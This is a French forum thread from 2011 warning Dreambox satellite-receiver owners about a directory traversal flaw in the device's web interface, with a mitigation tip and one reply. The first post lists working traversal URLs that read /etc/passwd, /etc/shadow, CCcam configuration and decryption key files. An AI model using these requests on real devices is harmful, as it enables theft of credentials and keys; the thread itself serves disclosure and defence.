Merci Merci:  1
Likes Likes:  0
Dislikes Dislikes:  0
Affiche les résultats de 1 à 2 sur 2

Sujet : Important pour tous les pocesseurs de dreambox
Le problème de ce sujet a été résolu / Voir les messages utiles


  1. #1
    DZSatien Habitué Avatar de bLuBx
    Inscrit
    Aug 2010
    Lieu
    france
    Messages
    144
    Récepteur
    dm500hd,s
    TV
    ASUS PQ321Q (4K)
    Remerciement / J'aime

    Icon4 Important pour tous les pocesseurs de dreambox

    Salut tout le monde
    une faille a été découvert dans le code de l'interface http de la dreambox
    un directory transversal ou arbitrary file download
    ciblé pour la DM500* ( mais 2 ou 3 autre version sont aussi vulnerable )

    Code:
    http://192.168.1.11/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../var/etc/CCcam.cfg%00
    http://192.168.1.11/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd%00
    http://192.168.1.11/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/shadow%00
    http://192.168.1.11/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../Autoupdate.key%00
    http://192.168.1.11/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../camd3.config%00
    http://192.168.1.11/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../var/keys/camd3.keys%00
    Citation Envoyé par Advisory
    Advisory ID: ZSL-2011-5013Advisory
    URL: http://www.zeroscience.mk/codes/dreambox_fd.txt
    Alors cette faille n'est pas patcher , mais ne concerne que les idiots qui on leur port 80 ouvert sur le net
    Donc c'est simple , on vire la dreambox du DMZ et on NAT que les port VRAIMENT utile (cccam par exemple)

    ps: toutes les version de DM500* ou autre ne sont pas vulnerable ...

    bye
    Dernière édition par bLuBx; 13-05-2011 à 13:30

  2. Merci lightman33 disent merci

  3. #2
    Nouveau
    Inscrit
    Feb 2011
    Messages
    1
    Récepteur
    samsat HD55
    TV
    panasonic
    Remerciement / J'aime
    Salut,
    et quel port pour cccam ?

    je ne comprend pas bien tu dis que la faille cible les DM500 et en PS tu dis que les version DM500 ne sont pas vulnérable ?
    et merci pour l'info

Sujets similaires

  1. important a tous
    Par khalil96 dans le forum Entraide Starsat
    Réponses: 2
    Dernier message: 21-06-2010, 08:20
  2. important a tous
    Par khalil96 dans le forum Newcamd Section
    Réponses: 0
    Dernier message: 09-06-2010, 23:00
  3. Réponses: 0
    Dernier message: 01-09-2009, 07:01

Règles des messages

  • Vous ne pouvez pas créer de sujets
  • Vous ne pouvez pas répondre aux sujets
  • Vous ne pouvez pas importer de fichiers joints
  • Vous ne pouvez pas modifier vos messages
  •  
Nous contacter | DZSat | Archives | Haut de page